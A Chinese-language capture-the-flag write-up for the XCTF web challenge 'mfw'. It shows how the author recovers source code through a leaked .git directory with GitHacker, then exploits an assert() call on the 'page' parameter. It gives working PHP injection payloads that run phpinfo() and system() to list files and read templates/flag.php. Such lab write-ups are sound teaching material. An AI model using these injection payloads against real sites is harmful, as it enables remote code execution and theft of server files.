XCTF WEB mfw

XCTF WEB mfw

  • 比赛打自闭了,需要好好学习

打开网页看见(猜测git源码泄露):
XCTF WEB mfw_第1张图片
在URL后面加上./git发现:
XCTF WEB mfw_第2张图片
使用脚本,在Linux环境中:

pip install requests
git clone https://github.com/wangyihang/GitHacker.git
python GitHacker.py [Website]

得到源码:
XCTF WEB mfw_第3张图片
flag文件貌似没得啥:
XCTF WEB mfw_第4张图片
查看index.php文件内容得到PHP源码:


html代码........

代码审计以及思路:

了解assert()函数的使用:
XCTF WEB mfw_第5张图片
assert()函数会将读入的代码当做PHP代码来执行,这就方便了!!
进行注入,注入的思路:

  • 首先对strpos函数进行闭合,构造一下,page=’)

  • 可以把后面', '..') === false的给注释掉,构造page=').phpinfo();//,可以得到回显XCTF WEB mfw_第6张图片

  • 或者不注释也行,直接插入,构造page='.phpinfo().',也可以看见:XCTF WEB mfw_第7张图片

  • 既然可以执行函数,那就简单了,使用system()函数(system函数详解),构造查看目录的payload:?page='.system("ls").'或者page=').system("ls");//前者直接显示,后者在源码中才能看见。

  • 由于源码直接下载有,所以直接构造得到flag的payload:?page=').system("cat templates/flag.php");//或者?page='.system("cat templates/flag.php").'两者都需查看源码!!

XCTF WEB mfw_第8张图片
XCTF WEB mfw_第9张图片

你可能感兴趣的:(CTF题,XCTF)